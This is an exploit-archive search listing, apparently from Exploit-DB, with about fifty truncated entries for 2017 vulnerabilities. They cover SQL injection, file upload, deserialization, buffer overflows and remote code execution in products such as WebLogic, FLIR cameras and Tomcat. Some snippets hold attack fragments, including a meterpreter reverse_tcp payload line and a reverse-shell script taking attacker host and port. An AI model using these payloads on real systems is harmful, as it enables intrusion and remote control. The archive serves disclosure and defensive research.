41207 matches found
Trend Micro OfficeScan 11.0XG (12.0) - Code Execution Memory Corruption
Trend Micro OfficeScan 11.0XG 12.0 - Code Execution Memory Corruption + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt +...
SmarterStats 11.3.6347 - Cross-Site Scripting
SmarterStats 11.3.6347 - Cross-Site Scripting ---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries...
NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl...
LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
LAquis SCADA 4.1.0.2385 - Directory Traversal Metasploit require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage:...
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution
Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...
WordPress Plugin WPAMS - SQL Injection
WordPress Plugin WPAMS - SQL Injection Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...
AMC Master - Arbitrary File Upload
AMC Master - Arbitrary File Upload Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Dem...
WordPress Plugin Hospital Management System - SQL Injection
WordPress Plugin Hospital Management System - SQL Injection Exploit Title: Hospital Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634 Demo:...
SMSmaster - SQL Injection
SMSmaster - SQL Injection Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...
TicketPlus - Arbitrary File Upload
TicketPlus - Arbitrary File Upload Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo:...
Photo Fusion - Arbitrary File Upload
Photo Fusion - Arbitrary File Upload Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo:...
Job Links - Arbitrary File Upload
Job Links - Arbitrary File Upload Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo:...
WordPress Plugin WPGYM - SQL Injection
WordPress Plugin WPGYM - SQL Injection Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo:...
WordPress Plugin WPCHURCH - SQL Injection
WordPress Plugin WPCHURCH - SQL Injection Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...
WordPress Plugin School Management System - SQL Injection
WordPress Plugin School Management System - SQL Injection Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo:...
Tiny HTTPd 0.1.0 - Directory Traversal
Tiny HTTPd 0.1.0 - Directory Traversal ====================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal Date: 26-09-2017 Website: www.touhidshaikh.com Vulnerable Software: Tiny HTTPd Version...
Linux Kernel 3.10.0-514.21.2.el7.x86_64 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable PIE Local Privilege Escalation
Linux Kernel 3.10.0-514.21.2.el7.x8664 3.10.0-514.26.1.el7.x8664 CentOS 7 - SUID Position Independent Executable PIE Local Privilege Escalation / CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x8664 and 3.10.0-514.26.1.el7.x8664 Copyright C 2017 Qualys, Inc. This...
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7. The exploit has been tested against the Wi-Fi firmware as...
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow Date: 09/25/2017 Exploit Author: Charles Dardaman Twitter: https://twitter.com/CharlesDardaman Website: http://www.dardaman.com Version:9.2.0.1 Tested on: Windows 2000 SP4 CVE: 2003-0727 This i...
FLIR Thermal Camera FFCPTD - Stream Disclosure
FLIR Thermal Camera FFCPTD - Stream Disclosure FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2...
FLIR Thermal Camera FFCPTD - Information Disclosure
FLIR Thermal Camera FFCPTD - Information Disclosure FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA,...
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
FLIR Thermal Camera PT-Series PT-334 200562 - Root Remote Code Execution !/bin/bash FLIR Systems FLIR Thermal Camera PT-Series PT-334 200562 Remote Root Exploit Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.4...
Adobe Flash - Out-of-Bounds Read in applyToRange
Adobe Flash - Out-of-Bounds Read in applyToRange Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange. Proof of Concept:...
FLIR Thermal Camera FC-SPT - Command Injection
FLIR Thermal Camera FC-SPT - Command Injection FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3...
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash Proof of Concept:...
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321 The attached MP4 file causes an out-of-bounds memory access when played in flash player. Proof of Concept:...
FLIR Thermal Camera FFCPTD - SSH Backdoor Access
FLIR Thermal Camera FFCPTD - SSH Backdoor Access FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA...
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow SEH Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp...
HBGK DVR 3.0.0 build20161206 - Authentication Bypass
HBGK DVR 3.0.0 build20161206 - Authentication Bypass Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass Date: 24-09-2017 Vendor Homepage: http://www.hbgk.net/en/ Exploit Author: RAT - ThiefKing Contact: https://www.facebook.com/cctvsuperpassword Website: http://tromcap.com...
CyberLink LabelPrint 2.5 - Local Buffer Overflow (SEH Unicode)
CyberLink LabelPrint 2.5 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...
Cash Back Comparison Script 1.0 - SQL Injection
Cash Back Comparison Script 1.0 - SQL Injection !/usr/bin/perl -w Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://cashbackcomparisonscript.com/ Software Link: http://cashbackcomparisonscript.com/demo/features/ Demo:...
PHP Auction Ecommerce Script 1.6 - SQL Injection
PHP Auction Ecommerce Script 1.6 - SQL Injection Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/ Version: 1....
JitBit HelpDesk 9.0.2 - Authentication Bypass
JitBit HelpDesk 9.0.2 - Authentication Bypass Exploit Title: JitBit HelpDesk = 9.0.2 Broken Authentication Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com Date: 09/22/2017 Exploit Author: Rob Simon Kc57 - TrustedSec www.trustedsec.com Vendor Homepage: https://www.jitbit.com/helpdesk/...
Lending And Borrowing - pid SQL Injection
Lending And Borrowing - pid SQL Injection Exploit Title: Lending And Borrowing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/ Demo: http://74.124.215.220/realfund/...
Stock Photo Selling 1.0 - SQL Injection
Stock Photo Selling 1.0 - SQL Injection !/usr/bin/perl -w Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection Dork: N/A Date: 21.09.2017 Vendor Homepage: http://sixthlife.net/ Software Link: http://sixthlife.net/product/stock-photo-selling-website/ Demo: http://www.photoreels.com/...
Claydip Airbnb Clone 1.0 - Arbitrary File Upload
Claydip Airbnb Clone 1.0 - Arbitrary File Upload Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload Dork: N/A Date: 22.09.2017 Vendor Homepage: https://www.claydip.com/ Software Link: https://www.claydip.com/airbnb-clone.html Demo: https://www.claydip.com/airbnbdemo.html...
Secure E-commerce Script 1.02 - sid SQL Injection
Secure E-commerce Script 1.02 - sid SQL Injection Exploit Title: Secure E-commerce Script v1.02 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/ Version: 1.02...
Multi Level Marketing - SQL Injection
Multi Level Marketing - SQL Injection Exploit Title: Multi Level Marketing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/ Demo: http://74.124.215.220/advaemlm/...
ERS Data System 1.8.1 - Java Deserialization
ERS Data System 1.8.1 - Java Deserialization Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability Google Dork: N/A Date: 9/21/2017 Exploit Author: West Shepherd Vendor Homepage: http://www.ersdata.com Software Link: www.ersdata.com/downloads/ErsSetup.exe Version: 1.8.1.0 Tested on:...
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes GetFuncExprNameReference || funcInfo-funcExprScope && funcInfo-funcExprScope-GetIsObject ... Js::RegSlot ldFuncExprDst = sym-GetLocation; this-mwriter.Reg1Js::OpCode::LdFuncExpr, ldFuncExprDst; if sym-IsInSlotfuncInfo Js::RegSlot...
Microsoft Edge Chakra - JavascriptFunction::ReparseAsmJsModule Incorrectly Re-parses
Microsoft Edge Chakra - JavascriptFunction::ReparseAsmJsModule Incorrectly Re-parses GetParseableFunctionInfo; AssertfunctionInfo; functionInfo-GetFunctionBody-AddDeferParseAttribute; functionInfo-GetFunctionBody-ResetEntryPoint; functionInfo-GetFunctionBody-ResetInParams; FunctionBody funcBody =...
Linux Kernel 4.13.1 - BlueTooth Buffer Overflow (PoC)
Linux Kernel 4.13.1 - BlueTooth Buffer Overflow PoC Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS Crash only Date: 09/21/2017 Exploit Author: Marcin Kozlowski Version: Kernel version v3.3-rc1, and thus affects all version from there on Tested on: Linux 4.4.0-93-generic...
Microsoft Edge - Chakra Incorrectly Parses Object Patterns
Microsoft Edge - Chakra Incorrectly Parses Object Patterns function f a: b = 0x1111, c = 0x2222, .c = 0x3333 = ; f;...
Microsoft Edge Chakra - Parser::ParseCatch Does Not Handle eval() (Denial of Service)
Microsoft Edge Chakra - Parser::ParseCatch Does Not Handle eval Denial of Service PnodeBlockType::Regular, isPattern ? ScopeTypeCatchParamPattern : ScopeTypeCatch; ... ParseNodePtr pnodePattern = ParseDestructuredLiteraltkLET, true /isDecl/, true /topLevel/, DICForceErrorOnInitializer; ... 1...
PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)
PHPMyFAQ 2.9.8 - Cross-Site Scripting 1 Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vendor Homepage: http://www.phpmyfaq.de/ Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website:...
Apache Tomcat 9.0.1 (Beta) 8.5.23 8.0.47 7.0.8 - JSP Upload Bypass Remote Code Execution (1)
Apache Tomcat 9.0.1 Beta 8.5.23 8.0.47 7.0.8 - JSP Upload Bypass Remote Code Execution 1 E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html When running on Windows with HTTP PUTs enabled e.g. via setting the readonly initialisation parameter of the...
Android Bluetooth - Blueborne Information Leak (2)
Android Bluetooth - Blueborne Information Leak 2 from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate: pkt =...
DenyAll WAF 6.3.0 - Remote Code Execution (Metasploit)
DenyAll WAF 6.3.0 - Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "DenyAll Web Application Firewall Remote Code Execution", 'Description' = %q This module...
HPE 7.2 - Java Deserialization
HPE 7.2 - Java Deserialization !/usr/bin/env python HPE/H3C IMC - Java Deserialization Exploit Version 0.1 Tested on Windows Server 2008 R2 Name HPE/H3C IMC Intelligent Management Center Java 1.8.091 Author: Raphael Kuhn Daimler TSS Special thanks to: Jan Esslinger @Hngan for the websphere exploi...